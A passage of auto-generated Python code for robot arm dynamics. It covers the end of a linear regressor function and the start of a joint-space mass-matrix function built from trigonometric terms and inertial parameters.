regressor_out[60] = -x331*x4 + x7*(-x26*x332 - x28*x334)
regressor_out[61] = -x347*x4 + x7*(-x26*x348 - x28*x350)
regressor_out[62] = -x365*x4 + x7*(-x26*x362 - x28*x364)
regressor_out[63] = -x373*x4 + x7*(-x26*x370 - x28*x372)
regressor_out[64] = -x381*x4 + x7*(-x26*x384 - x28*x383)
regressor_out[65] = -x389*x4 + x7*(-x26*x390 - x28*x392)
regressor_out[66] = x4*(-0.03175*x411 + 0.03175*x416 - x417) + x7*(x27*x414 + x406*x60 + 0.27857*x411 - 0.27857*x416)
regressor_out[67] = x4*(-0.03175*x437 + 0.03175*x439 - x443) + x7*(x27*x442 + x432*x60 + 0.27857*x437 - 0.27857*x439)
regressor_out[68] = x4*(-x455 - 0.03175*x457 + 0.03175*x462) + x7*(x27*x467 + 0.27857*x457 - 0.27857*x462 + x466*x60)
regressor_out[69] = x4*(-x472 - 0.03175*x474 + 0.03175*x478) + x7*(x27*x483 + 0.27857*x474 - 0.27857*x478 + x482*x60)
regressor_out[70] = 0
regressor_out[71] = 0
regressor_out[72] = -x4*x503 + x7*(-x26*x506 - x28*x505)
regressor_out[73] = -x4*x525 + x7*(-x26*x524 - x28*x521)
regressor_out[74] = -x4*x543 + x7*(-x26*x542 - x28*x539)
regressor_out[75] = -x4*x551 + x7*(-x26*x554 - x28*x553)
regressor_out[76] = -x4*x565 + x7*(-x26*x568 - x28*x567)
regressor_out[77] = -x4*x576 + x7*(-x26*x579 - x28*x578)
regressor_out[78] = x4*(-x597 + 0.03175*x602 - 0.03175*x604) + x7*(x27*x609 + x60*x608 - 0.27857*x602 + 0.27857*x604)
regressor_out[79] = x4*(-x628 + 0.03175*x633 - 0.03175*x635) + x7*(x27*x640 + x60*x639 - 0.27857*x633 + 0.27857*x635)
regressor_out[80] = x4*(-0.03175*x650 + 0.03175*x655 - x663) + x7*(x27*x668 + x60*x667 + 0.27857*x650 - 0.27857*x655)
regressor_out[81] = x4*(-0.03175*x684 + 0.03175*x686 - x687) + x7*(x27*x674 + x60*x681 + 0.27857*x684 - 0.27857*x686)
regressor_out[82] = 0
regressor_out[83] = 0
regressor_out[84] = 0
regressor_out[85] = 0
regressor_out[86] = 0
regressor_out[87] = 0
regressor_out[88] = 0
regressor_out[89] = 0
regressor_out[90] = 0
regressor_out[91] = 0
regressor_out[92] = 0
regressor_out[93] = 0
regressor_out[94] = 0
regressor_out[95] = 0
regressor_out[96] = x19
regressor_out[97] = x16 - x20
regressor_out[98] = x18 + x8
regressor_out[99] = x14
regressor_out[100] = x10 + x11
regressor_out[101] = ddq[1]
regressor_out[102] = x24
regressor_out[103] = x62
regressor_out[104] = 0
regressor_out[105] = 0
regressor_out[106] = dq[1]
regressor_out[107] = sign(dq[1])
regressor_out[108] = x27*x35 + x28*x33
regressor_out[109] = x27*x40 + x28*x38
regressor_out[110] = x27*x45 + x688
regressor_out[111] = x107*x26 + x28*x50
regressor_out[112] = x27*x53 + x28*x54
regressor_out[113] = x27*x37 + x28*x39
regressor_out[114] = 0.03175*x134 - 0.27857*x26*x56 + x27*x59 - 0.27857*x688
regressor_out[115] = -0.27857*x26*x66 + x28*x58 - 0.27857*x28*x68 + 0.03175*x40
regressor_out[116] = -0.27857*x26*x52 + x27*x70 + x28*x65 - 0.27857*x28*x74 - 0.03175*x41 - 0.03175*x42
regressor_out[117] = -0.27857*x26*x70 - 0.27857*x28*x64 + 0.03175*x58
regressor_out[118] = 0
regressor_out[119] = 0
regressor_out[120] = x27*x92 + x28*x88
regressor_out[121] = x103*x27 + x28*x99
regressor_out[122] = x112*x28 + x115*x27
regressor_out[123] = x118*x28 + x27*x91
regressor_out[124] = x121*x28 + x123*x27
regressor_out[125] = x126*x27 + x127*x28
regressor_out[126] = 0.03175*x111 - 0.27857*x129*x28 - 0.27857*x132*x26 + 0.03175*x139 + x140*x27 + x143*x28
regressor_out[127] = -0.27857*x147*x26 - 0.27857*x149*x28 + 0.03175*x152 + 0.03175*x153 + x156*x27 + x157*x28
regressor_out[128] = -0.27857*x162*x26 - 0.27857*x164*x28 + 0.03175*x166 + x167*x27 + x168*x28
regressor_out[129] = -0.27857*x142*x28 - 0.27857*x169*x26 + 0.03175*x171 + x172*x27
regressor_out[130] = 0
regressor_out[131] = 0
regressor_out[132] = x184*x27 + x188*x28
regressor_out[133] = x196*x27 + x201*x28
regressor_out[134] = x209*x27 + x214*x28
regressor_out[135] = x217*x27 + x219*x28
regressor_out[136] = x224*x27 + x227*x28
regressor_out[137] = x230*x27 + x233*x28
regressor_out[138] = x244*x28 - 0.27857*x246*x28 + 0.03175*x250 + 0.03175*x255 + x256*x27 - 0.27857*x257*x26
regressor_out[139] = -0.27857*x26*x264 + 0.03175*x266 + 0.03175*x269 + x27*x270 + x276*x28 - 0.27857*x278*x28
regressor_out[140] = -0.27857*x26*x291 + x27*x299 - 0.27857*x28*x293 + x28*x295 + 0.03175*x296 + 0.03175*x297
regressor_out[141] = -0.27857*x26*x306 + x27*x311 - 0.27857*x28*x302 + x28*x313 + 0.03175*x308 + 0.03175*x310
regressor_out[142] = 0
regressor_out[143] = 0
regressor_out[144] = x27*x334 + x28*x332
regressor_out[145] = x27*x350 + x28*x348
regressor_out[146] = x27*x364 + x28*x362
regressor_out[147] = x27*x372 + x28*x370
regressor_out[148] = x27*x383 + x28*x384
regressor_out[149] = x27*x392 + x28*x390
regressor_out[150] = -0.27857*x26*x415 + x27*x406 - 0.27857*x28*x410 + x28*x414 + 0.03175*x403 + 0.03175*x405
regressor_out[151] = -0.27857*x26*x438 + x27*x432 - 0.27857*x28*x436 + x28*x442 + 0.03175*x429 + 0.03175*x431
regressor_out[152] = -0.27857*x26*x461 + x27*x466 - 0.27857*x28*x456 + x28*x467 + 0.03175*x463 + 0.03175*x464
regressor_out[153] = -0.27857*x26*x477 + x27*x482 - 0.27857*x28*x473 + x28*x483 + 0.03175*x480 + 0.03175*x481
regressor_out[154] = 0
regressor_out[155] = 0
regressor_out[156] = x27*x505 + x28*x506
regressor_out[157] = x27*x521 + x28*x524
regressor_out[158] = x27*x539 + x28*x542
regressor_out[159] = x27*x553 + x28*x554
regressor_out[160] = x27*x567 + x28*x568
regressor_out[161] = x27*x578 + x28*x579
regressor_out[162] = -0.27857*x26*x601 + x27*x608 - 0.27857*x28*x603 + x28*x609 + 0.03175*x605 + 0.03175*x607
regressor_out[163] = -0.27857*x26*x632 + x27*x639 - 0.27857*x28*x634 + x28*x640 + 0.03175*x637 + 0.03175*x638
regressor_out[164] = -0.27857*x26*x654 + x27*x667 - 0.27857*x28*x649 + x28*x668 + 0.03175*x664 + 0.03175*x665
regressor_out[165] = -0.27857*x26*x685 + x27*x681 + x28*x674 - 0.27857*x28*x683 + 0.03175*x678 + 0.03175*x680
regressor_out[166] = 0
regressor_out[167] = 0
regressor_out[168] = 0
regressor_out[169] = 0
regressor_out[170] = 0
regressor_out[171] = 0
regressor_out[172] = 0
regressor_out[173] = 0
regressor_out[174] = 0
regressor_out[175] = 0
regressor_out[176] = 0
regressor_out[177] = 0
regressor_out[178] = 0
regressor_out[179] = 0
regressor_out[180] = 0
regressor_out[181] = 0
regressor_out[182] = 0
regressor_out[183] = 0
regressor_out[184] = 0
regressor_out[185] = 0
regressor_out[186] = 0
regressor_out[187] = 0
regressor_out[188] = 0
regressor_out[189] = 0
regressor_out[190] = 0
regressor_out[191] = 0
regressor_out[192] = x32
regressor_out[193] = x43
regressor_out[194] = x51
regressor_out[195] = x31
regressor_out[196] = x52
regressor_out[197] = x47
regressor_out[198] = x64
regressor_out[199] = x71
regressor_out[200] = 0
regressor_out[201] = 0
regressor_out[202] = dq[2]
regressor_out[203] = sign(dq[2])
regressor_out[204] = x93
regressor_out[205] = x104
regressor_out[206] = x110
regressor_out[207] = x116
regressor_out[208] = x124
regressor_out[209] = x125
regressor_out[210] = x144
regressor_out[211] = x151
regressor_out[212] = x160
regressor_out[213] = x174
regressor_out[214] = 0
regressor_out[215] = 0
regressor_out[216] = x189
regressor_out[217] = x202
regressor_out[218] = x215
regressor_out[219] = x220
regressor_out[220] = x228
regressor_out[221] = x234
regressor_out[222] = x259
regressor_out[223] = x280
regressor_out[224] = x287
regressor_out[225] = x314
regressor_out[226] = 0
regressor_out[227] = 0
regressor_out[228] = x331
regressor_out[229] = x347
regressor_out[230] = x365
regressor_out[231] = x373
regressor_out[232] = x381
regressor_out[233] = x389
regressor_out[234] = x417
regressor_out[235] = x443
regressor_out[236] = x455
regressor_out[237] = x472
regressor_out[238] = 0
regressor_out[239] = 0
regressor_out[240] = x503
regressor_out[241] = x525
regressor_out[242] = x543
regressor_out[243] = x551
regressor_out[244] = x565
regressor_out[245] = x576
regressor_out[246] = x597
regressor_out[247] = x628
regressor_out[248] = x663
regressor_out[249] = x687
regressor_out[250] = 0
regressor_out[251] = 0
regressor_out[252] = 0
regressor_out[253] = 0
regressor_out[254] = 0
regressor_out[255] = 0
regressor_out[256] = 0
regressor_out[257] = 0
regressor_out[258] = 0
regressor_out[259] = 0
regressor_out[260] = 0
regressor_out[261] = 0
regressor_out[262] = 0
regressor_out[263] = 0
regressor_out[264] = 0
regressor_out[265] = 0
regressor_out[266] = 0
regressor_out[267] = 0
regressor_out[268] = 0
regressor_out[269] = 0
regressor_out[270] = 0
regressor_out[271] = 0
regressor_out[272] = 0
regressor_out[273] = 0
regressor_out[274] = 0
regressor_out[275] = 0
regressor_out[276] = 0
regressor_out[277] = 0
regressor_out[278] = 0
regressor_out[279] = 0
regressor_out[280] = 0
regressor_out[281] = 0
regressor_out[282] = 0
regressor_out[283] = 0
regressor_out[284] = 0
regressor_out[285] = 0
regressor_out[286] = 0
regressor_out[287] = 0
regressor_out[288] = x91
regressor_out[289] = x102
regressor_out[290] = x114
regressor_out[291] = x90
regressor_out[292] = x122
regressor_out[293] = x108
regressor_out[294] = x137
regressor_out[295] = x155
regressor_out[296] = 0
regressor_out[297] = 0
regressor_out[298] = dq[3]
regressor_out[299] = sign(dq[3])
regressor_out[300] = x183
regressor_out[301] = x195
regressor_out[302] = x208
regressor_out[303] = x216
regressor_out[304] = x223
regressor_out[305] = x229
regressor_out[306] = x252
regressor_out[307] = x268
regressor_out[308] = x298
regressor_out[309] = x309
regressor_out[310] = 0
regressor_out[311] = 0
regressor_out[312] = x333
regressor_out[313] = x349
regressor_out[314] = x363
regressor_out[315] = x371
regressor_out[316] = x382
regressor_out[317] = x391
regressor_out[318] = x401
regressor_out[319] = x427
regressor_out[320] = x465
regressor_out[321] = x479
regressor_out[322] = 0
regressor_out[323] = 0
regressor_out[324] = x504
regressor_out[325] = x520
regressor_out[326] = x538
regressor_out[327] = x552
regressor_out[328] = x566
regressor_out[329] = x577
regressor_out[330] = x606
regressor_out[331] = x636
regressor_out[332] = x666
regressor_out[333] = x676
regressor_out[334] = 0
regressor_out[335] = 0
regressor_out[336] = 0
regressor_out[337] = 0
regressor_out[338] = 0
regressor_out[339] = 0
regressor_out[340] = 0
regressor_out[341] = 0
regressor_out[342] = 0
regressor_out[343] = 0
regressor_out[344] = 0
regressor_out[345] = 0
regressor_out[346] = 0
regressor_out[347] = 0
regressor_out[348] = 0
regressor_out[349] = 0
regressor_out[350] = 0
regressor_out[351] = 0
regressor_out[352] = 0
regressor_out[353] = 0
regressor_out[354] = 0
regressor_out[355] = 0
regressor_out[356] = 0
regressor_out[357] = 0
regressor_out[358] = 0
regressor_out[359] = 0
regressor_out[360] = 0
regressor_out[361] = 0
regressor_out[362] = 0
regressor_out[363] = 0
regressor_out[364] = 0
regressor_out[365] = 0
regressor_out[366] = 0
regressor_out[367] = 0
regressor_out[368] = 0
regressor_out[369] = 0
regressor_out[370] = 0
regressor_out[371] = 0
regressor_out[372] = 0
regressor_out[373] = 0
regressor_out[374] = 0
regressor_out[375] = 0
regressor_out[376] = 0
regressor_out[377] = 0
regressor_out[378] = 0
regressor_out[379] = 0
regressor_out[380] = 0
regressor_out[381] = 0
regressor_out[382] = 0
regressor_out[383] = 0
regressor_out[384] = x186
regressor_out[385] = x199
regressor_out[386] = x211
regressor_out[387] = x185
regressor_out[388] = x225
regressor_out[389] = x203
regressor_out[390] = x242
regressor_out[391] = x275
regressor_out[392] = 0
regressor_out[393] = 0
regressor_out[394] = dq[4]
regressor_out[395] = sign(dq[4])
regressor_out[396] = x330
regressor_out[397] = x340
regressor_out[398] = x356
regressor_out[399] = x367
regressor_out[400] = x380
regressor_out[401] = x388
regressor_out[402] = x413
regressor_out[403] = x441
regressor_out[404] = x444
regressor_out[405] = 0
regressor_out[406] = 0
regressor_out[407] = 0
regressor_out[408] = x502
regressor_out[409] = x522
regressor_out[410] = x540
regressor_out[411] = x550
regressor_out[412] = x564
regressor_out[413] = x575
regressor_out[414] = x596
regressor_out[415] = x627
regressor_out[416] = x662
regressor_out[417] = 0
regressor_out[418] = 0
regressor_out[419] = 0
regressor_out[420] = 0
regressor_out[421] = 0
regressor_out[422] = 0
regressor_out[423] = 0
regressor_out[424] = 0
regressor_out[425] = 0
regressor_out[426] = 0
regressor_out[427] = 0
regressor_out[428] = 0
regressor_out[429] = 0
regressor_out[430] = 0
regressor_out[431] = 0
regressor_out[432] = 0
regressor_out[433] = 0
regressor_out[434] = 0
regressor_out[435] = 0
regressor_out[436] = 0
regressor_out[437] = 0
regressor_out[438] = 0
regressor_out[439] = 0
regressor_out[440] = 0
regressor_out[441] = 0
regressor_out[442] = 0
regressor_out[443] = 0
regressor_out[444] = 0
regressor_out[445] = 0
regressor_out[446] = 0
regressor_out[447] = 0
regressor_out[448] = 0
regressor_out[449] = 0
regressor_out[450] = 0
regressor_out[451] = 0
regressor_out[452] = 0
regressor_out[453] = 0
regressor_out[454] = 0
regressor_out[455] = 0
regressor_out[456] = 0
regressor_out[457] = 0
regressor_out[458] = 0
regressor_out[459] = 0
regressor_out[460] = 0
regressor_out[461] = 0
regressor_out[462] = 0
regressor_out[463] = 0
regressor_out[464] = 0
regressor_out[465] = 0
regressor_out[466] = 0
regressor_out[467] = 0
regressor_out[468] = 0
regressor_out[469] = 0
regressor_out[470] = 0
regressor_out[471] = 0
regressor_out[472] = 0
regressor_out[473] = 0
regressor_out[474] = 0
regressor_out[475] = 0
regressor_out[476] = 0
regressor_out[477] = 0
regressor_out[478] = 0
regressor_out[479] = 0
regressor_out[480] = x326
regressor_out[481] = x344
regressor_out[482] = x359
regressor_out[483] = x325
regressor_out[484] = x377
regressor_out[485] = x353
regressor_out[486] = x394
regressor_out[487] = x421
regressor_out[488] = 0
regressor_out[489] = 0
regressor_out[490] = dq[5]
regressor_out[491] = sign(dq[5])
regressor_out[492] = x494
regressor_out[493] = x518
regressor_out[494] = x536
regressor_out[495] = x547
regressor_out[496] = x561
regressor_out[497] = x569
regressor_out[498] = x588
regressor_out[499] = x619
regressor_out[500] = x656
regressor_out[501] = 0
regressor_out[502] = 0
regressor_out[503] = 0
regressor_out[504] = 0
regressor_out[505] = 0
regressor_out[506] = 0
regressor_out[507] = 0
regressor_out[508] = 0
regressor_out[509] = 0
regressor_out[510] = 0
regressor_out[511] = 0
regressor_out[512] = 0
regressor_out[513] = 0
regressor_out[514] = 0
regressor_out[515] = 0
regressor_out[516] = 0
regressor_out[517] = 0
regressor_out[518] = 0
regressor_out[519] = 0
regressor_out[520] = 0
regressor_out[521] = 0
regressor_out[522] = 0
regressor_out[523] = 0
regressor_out[524] = 0
regressor_out[525] = 0
regressor_out[526] = 0
regressor_out[527] = 0
regressor_out[528] = 0
regressor_out[529] = 0
regressor_out[530] = 0
regressor_out[531] = 0
regressor_out[532] = 0
regressor_out[533] = 0
regressor_out[534] = 0
regressor_out[535] = 0
regressor_out[536] = 0
regressor_out[537] = 0
regressor_out[538] = 0
regressor_out[539] = 0
regressor_out[540] = 0
regressor_out[541] = 0
regressor_out[542] = 0
regressor_out[543] = 0
regressor_out[544] = 0
regressor_out[545] = 0
regressor_out[546] = 0
regressor_out[547] = 0
regressor_out[548] = 0
regressor_out[549] = 0
regressor_out[550] = 0
regressor_out[551] = 0
regressor_out[552] = 0
regressor_out[553] = 0
regressor_out[554] = 0
regressor_out[555] = 0
regressor_out[556] = 0
regressor_out[557] = 0
regressor_out[558] = 0
regressor_out[559] = 0
regressor_out[560] = 0
regressor_out[561] = 0
regressor_out[562] = 0
regressor_out[563] = 0
regressor_out[564] = 0
regressor_out[565] = 0
regressor_out[566] = 0
regressor_out[567] = 0
regressor_out[568] = 0
regressor_out[569] = 0
regressor_out[570] = 0
regressor_out[571] = 0
regressor_out[572] = 0
regressor_out[573] = 0
regressor_out[574] = 0
regressor_out[575] = 0
regressor_out[576] = x498
regressor_out[577] = x509
regressor_out[578] = x532
regressor_out[579] = x497
regressor_out[580] = x555
regressor_out[581] = x528
regressor_out[582] = x582
regressor_out[583] = x612
regressor_out[584] = 0
regressor_out[585] = 0
regressor_out[586] = dq[6]
regressor_out[587] = sign(dq[6])
#
return regressor_out
def M( parms, q ) :
#
M_out = [0]*49
#
x0 = cos(q[1])
x1 = -x0
x2 = cos(q[2])
x3 = x1*x2
x4 = -sin(q[1])
x5 = -x4
x6 = 0.27857*x0 + 0.03175*x5
x7 = -x2
x8 = x6*x7
x9 = cos(q[3])
x10 = sin(q[2])
x11 = x1*x10
x12 = -x11
x13 = sin(q[3])
x14 = x12*x13 + x5*x9
x15 = -x3
x16 = -x15
x17 = -0.00502*x13*x15 + x8*x9
x18 = sin(q[4])
x19 = 0.27747*x16 + x17
x20 = cos(q[4])
x21 = x10*x6
x22 = -x21
x23 = x22 + 0.00502*x5
x24 = x11*x9 + x13*x5
x25 = x23 + 0.27747*x24
x26 = -x18*x19 - x20*x25
x27 = x16*x18 + x20*x24
x28 = -x27
x29 = sin(q[5])
x30 = cos(q[5])
x31 = x14*x30 + x28*x29
x32 = -x26
x33 = -x14*x29 - x27*x30
x34 = -x33
x35 = -x15*x20 - x18*x24
x36 = -x35
x37 = sin(q[6])
x38 = cos(q[6])
x39 = -x31*x38 - x36*x37
x40 = -x18
x41 = x19*x20 + x25*x40
x42 = -x41
x43 = -x13*x8 - 0.00502*x15*x9
x44 = x29*x42 + x30*x43
x45 = -x44
x46 = x32*x38 + x37*x45
x47 = -parms[79]*x34 + parms[80]*x39 + parms[81]*x46
x48 = -x32*x37 - x38*x44
x49 = -x31
x50 = x36*x38 + x37*x49
x51 = -parms[78]*x34 + parms[80]*x50 - parms[81]*x48
x52 = parms[54]*x14 + parms[56]*x28 + parms[57]*x26 - parms[66]*x34 - parms[67]*x31 - parms[69]*x32 - x37*x51 - x38*x47
x53 = -x14
x54 = -x29*x43 - x30*x41
x55 = -x54
x56 = -parms[66]*x36 - parms[68]*x49 - parms[69]*x54 - parms[78]*x39 + parms[79]*x50 + parms[81]*x55
x57 = -x37
x58 = -parms[67]*x36 + parms[68]*x33 + parms[69]*x44 + x38*x51 + x47*x57
x59 = -x29
x60 = parms[55]*x53 + parms[56]*x35 + parms[57]*x41 + x30*x56 + x58*x59
x61 = x20*x60
x62 = parms[43]*x16 + parms[44]*x14 + parms[45]*x17 + x40*x52 + x61
x63 = parms[42]*x15 - parms[44]*x24 + parms[45]*x43 + parms[54]*x36 + parms[55]*x27 + parms[57]*x43 + x29*x56 + x30*x58
x64 = -x13
x65 = -parms[31]*x5 + parms[32]*x3 + parms[33]*x8 + x62*x9 + x63*x64
x66 = x2*x65
x67 = -x43
x68 = -parms[78]
x69 = parms[73]*x50 + parms[75]*x39 + parms[76]*x34 + parms[80]*x46 + x55*x68
x70 = -parms[80]
x71 = parms[72]*x50 + parms[73]*x39 + parms[74]*x34 + parms[79]*x55 + x48*x70
x72 = parms[62]*x31 + parms[64]*x33 + parms[65]*x36 + parms[66]*x54 + parms[67]*x45 + x38*x71 + x57*x69
x73 = parms[49]*x27 + parms[51]*x35 + parms[52]*x14 + parms[54]*x67 + parms[56]*x41 - x72
x74 = x20*x52
x75 = -0.27747*x18
x76 = -x38
x77 = parms[60]*x31 + parms[61]*x33 + parms[62]*x36 + parms[67]*x32 + parms[68]*x55 + x57*x71 + x69*x76
x78 = -parms[66]
x79 = -parms[79]
x80 = parms[74]*x50 + parms[76]*x39 + parms[77]*x34 + parms[78]*x48 + x46*x79
x81 = parms[61]*x31 + parms[63]*x33 + parms[64]*x36 + parms[68]*x44 + x32*x78 - x80
x82 = -x30
x83 = parms[48]*x27 + parms[49]*x35 + parms[50]*x14 + parms[55]*x43 + parms[56]*x32 + x59*x77 + x81*x82
x84 = parms[36]*x24 + parms[37]*x14 + parms[38]*x15 + parms[43]*x23 + parms[44]*x67 + x20*x83 + x40*x73 + x60*x75 - 0.27747*x74
x85 = parms[50]*x27 + parms[52]*x35 + parms[53]*x14 + parms[54]*x26 + parms[55]*x42 + x30*x77 + x59*x81
x86 = -parms[42]
x87 = parms[37]*x24 + parms[39]*x14 + parms[40]*x15 + parms[44]*x17 + x23*x86 + x85
x88 = parms[24]*x11 + parms[25]*x3 + parms[26]*x5 + parms[32]*x22 + x64*x87 + x84*x9
x89 = -x10
x90 = -x20
x91 = 0.27747*x18
x92 = -parms[43]
x93 = parms[38]*x24 + parms[40]*x14 + parms[41]*x15 + parms[42]*x43 + x17*x92 + x40*x83 + x52*x91 - 0.27747*x61 + x73*x90
x94 = x13*x62
x95 = x63*x9
x96 = parms[25]*x11 + parms[27]*x3 + parms[28]*x5 + parms[32]*x8 - x93 + 0.00502*x94 + 0.00502*x95
x97 = parms[42]*x53 + parms[43]*x24 + parms[45]*x23 + x40*x60 - x74
x98 = parms[30]*x5 + parms[32]*x12 + parms[33]*x21 - x97
x99 = x10*x98
x100 = -parms[31]
x101 = parms[26]*x11 + parms[28]*x3 + parms[29]*x5 + parms[30]*x21 + x100*x8 + x13*x84 + x87*x9 + 0.00502*x97
x102 = -0.27857*x2
x103 = -0.27857*x10
x104 = parms[14]*x0 + parms[16]*x4 + 0.03175*parms[30]*x15 + 0.03175*parms[31]*x11 + x102*x98 + x103*x65 + x2*x88 + x89*x96 + 0.03175*x94 + 0.03175*x95
x105 = -x89
x106 = 0.00502*x105 - 0.03175
x107 = -x103*x13 - x106*x9
x108 = x2*x9
x109 = -x105*x20 - x108*x18
x110 = -x109
x111 = x105*x40 + x108*x20
x112 = -x105
x113 = x103*x9 + x106*x64
x114 = 0.27747*x112 + x113
x115 = -x102
x116 = 0.27747*x108 + x115
x117 = x114*x20 + x116*x40
x118 = x107*x30 + x117*x59
x119 = x2*x64
x120 = -x111*x30 - x119*x29
x121 = -x120
x122 = -x114*x18 - x116*x20
x123 = -x122
x124 = x118*x57 + x123*x38
x125 = x111*x59 + x119*x30
x126 = -x110*x37 - x125*x38
x127 = -parms[79]*x121 + parms[80]*x126 + parms[81]*x124
x128 = x110*x38 + x125*x57
x129 = -x118*x38 - x123*x37
x130 = parms[78]*x121 - parms[80]*x128 + parms[81]*x129
x131 = -parms[67]*x110 + parms[68]*x120 + parms[69]*x118 + x127*x57 + x130*x76
x132 = -x107*x29 - x117*x30
x133 = -x132
x134 = parms[66]*x110 - parms[68]*x125 + parms[69]*x132 + parms[78]*x126 - parms[79]*x128 - parms[81]*x133
x135 = parms[42]*x105 - parms[44]*x108 + parms[45]*x107 + parms[54]*x110 + parms[55]*x111 + parms[57]*x107 + x131*x30 + x134*x59
x136 = x135*x9
x137 = -x119
x138 = parms[55]*x137 + parms[56]*x109 + parms[57]*x117 + x131*x59 + x134*x82
x139 = x138*x20
x140 = parms[54]*x119 - parms[56]*x111 + parms[57]*x122 - parms[66]*x121 - parms[67]*x125 - parms[69]*x123 - x127*x38 - x130*x57
x141 = parms[74]*x128 + parms[76]*x126 + parms[77]*x121 + parms[78]*x129 + x124*x79
x142 = parms[61]*x125 + parms[63]*x120 + parms[64]*x110 + parms[68]*x118 + x123*x78 - x141
x143 = parms[72]*x128 + parms[73]*x126 + parms[74]*x121 + parms[79]*x133 + x129*x70
x144 = parms[73]*x128 + parms[75]*x126 + parms[76]*x121 + parms[80]*x124 + x133*x68
x145 = parms[60]*x125 + parms[61]*x120 + parms[62]*x110 + parms[67]*x123 + parms[68]*x133 + x143*x57 + x144*x76
x146 = parms[48]*x111 + parms[49]*x109 + parms[50]*x119 + parms[55]*x107 + parms[56]*x123 + x142*x82 + x145*x59
x147 = -x107
x148 = -parms[67]
x149 = parms[62]*x125 + parms[64]*x120 + parms[65]*x110 + parms[66]*x132 + x118*x148 + x143*x38 + x144*x57
x150 = parms[49]*x111 + parms[51]*x109 + parms[52]*x119 + parms[54]*x147 + parms[56]*x117 - x149
x151 = parms[38]*x108 + parms[40]*x119 + parms[41]*x105 + parms[42]*x107 + x113*x92 - 0.27747*x139 + x140*x91 + x146*x40 + x150*x90
x152 = parms[43]*x112 + parms[44]*x119 + parms[45]*x113 + x139 + x140*x40
x153 = x13*x152
x154 = parms[42]*x137 + parms[43]*x108 + parms[45]*x115 + x138*x40 + x140*x90
x155 = -0.27747*x20
x156 = parms[36]*x108 + parms[37]*x119 + parms[38]*x105 + parms[43]*x115 + parms[44]*x147 + x138*x75 + x140*x155 + x146*x20 + x150*x40
x157 = -parms[55]
x158 = parms[50]*x111 + parms[52]*x109 + parms[53]*x119 + parms[54]*x122 + x117*x157 + x142*x59 + x145*x30
x159 = parms[37]*x108 + parms[39]*x119 + parms[40]*x105 + parms[44]*x113 + x115*x86 + x158
x160 = parms[26]*x2 + parms[28]*x89 + parms[30]*x102 + x100*x103 + x13*x156 + 0.00502*x154 + x159*x9
x161 = -x9
x162 = x13*x20
x163 = x162*x59 + x30*x9
x164 = x13*x40
x165 = -x164
x166 = -x163*x38 - x165*x37
x167 = x163*x57 + x165*x38
x168 = 0.27747*x13 + 0.00502
x169 = x168*x40
x170 = x169*x82
x171 = -x170
x172 = x169*x59
x173 = -x162*x30 - x29*x9
x174 = -x173
x175 = x168*x90
x176 = -x175
x177 = x172*x57 + x176*x38
x178 = -parms[79]*x174 + parms[80]*x166 + parms[81]*x177
x179 = -x172*x38 - x176*x37
x180 = parms[78]*x174 - parms[80]*x167 + parms[81]*x179
x181 = parms[55]*x161 + parms[56]*x164 + parms[57]*x169 + x59*(-parms[67]*x165 + parms[68]*x173 + parms[69]*x172 + x178*x57 + x180*x76) + x82*(parms[66]*x165 - parms[68]*x163 + parms[69]*x170 + parms[78]*x166 - parms[79]*x167 - parms[81]*x171)
x182 = parms[54]*x9 - parms[56]*x162 + parms[57]*x175 - parms[66]*x174 - parms[67]*x163 - parms[69]*x176 - x178*x38 - x180*x57
x183 = parms[74]*x167 + parms[76]*x166 + parms[77]*x174 + parms[78]*x179 + x177*x79
x184 = parms[61]*x163 + parms[63]*x173 + parms[64]*x165 + parms[68]*x172 + x176*x78 - x183
x185 = parms[73]*x167 + parms[75]*x166 + parms[76]*x174 + parms[80]*x177 + x171*x68
x186 = parms[72]*x167 + parms[73]*x166 + parms[74]*x174 + parms[79]*x171 + x179*x70
x187 = parms[60]*x163 + parms[61]*x173 + parms[62]*x165 + parms[67]*x176 + parms[68]*x171 + x185*x76 + x186*x57
x188 = parms[50]*x162 + parms[52]*x164 + parms[53]*x9 + parms[54]*x175 + x157*x169 + x184*x59 + x187*x30
x189 = parms[48]*x162 + parms[49]*x164 + parms[50]*x9 + parms[56]*x176 + x184*x82 + x187*x59
x190 = parms[62]*x163 + parms[64]*x173 + parms[65]*x165 + parms[66]*x170 + x148*x172 + x185*x57 + x186*x38
x191 = parms[49]*x162 + parms[51]*x164 + parms[52]*x9 + parms[56]*x169 - x190
x192 = parms[38]*x13 + parms[40]*x9 - 0.27747*x181*x20 + x182*x91 + x189*x40 + x191*x90
x193 = x155*x82
x194 = -x193
x195 = x40*x82
x196 = -x195
x197 = x40*x59
x198 = -x90
x199 = x197*x57 + x198*x38
x200 = x155*x59
x201 = -x91
x202 = -x200*x38 - x201*x37
x203 = -x197*x38 - x198*x37
x204 = parms[72]*x199 + parms[73]*x203 + parms[74]*x196 + parms[79]*x194 + x202*x70
x205 = x200*x57 + x201*x38
x206 = parms[73]*x199 + parms[75]*x203 + parms[76]*x196 + parms[80]*x205 + x194*x68
x207 = parms[62]*x197 + parms[64]*x195 + parms[65]*x198 + parms[66]*x193 + x148*x200 + x204*x38 + x206*x57
x208 = parms[78]*x196 - parms[80]*x199 + parms[81]*x202
x209 = -parms[79]*x196 + parms[80]*x203 + parms[81]*x205
x210 = parms[60]*x197 + parms[61]*x195 + parms[62]*x198 + parms[67]*x201 + parms[68]*x194 + x204*x57 + x206*x76
x211 = parms[74]*x199 + parms[76]*x203 + parms[77]*x196 + parms[78]*x202 + x205*x79
x212 = parms[61]*x197 + parms[63]*x195 + parms[64]*x198 + parms[68]*x200 + x201*x78 - x211
x213 = parms[50]*x40 + parms[52]*x90 + parms[54]*x91 + x155*x157 + x210*x30 + x212*x59
x214 = -x59
x215 = x30*x76
x216 = x30*x57
x217 = parms[72]*x216 + parms[73]*x215 + parms[74]*x214
x218 = parms[73]*x216 + parms[75]*x215 + parms[76]*x214
x219 = parms[74]*x216 + parms[76]*x215 + parms[77]*x214
x220 = parms[62]*x30 + parms[64]*x59 + x217*x38 + x218*x57
x221 = parms[74]*x38 + parms[76]*x57
#
M_out[0] = parms[5] + x0*(parms[12]*x0 + parms[13]*x4 - 0.27857*x66 + x7*x96 + x88*x89 + 0.27857*x99) + x4*(parms[13]*x0 + parms[15]*x4 - x101 + 0.03175*x66 - 0.03175*x99)
M_out[1] = x104
M_out[2] = x101
M_out[3] = x93
M_out[4] = x85
M_out[5] = x72
M_out[6] = x80
M_out[7] = x104
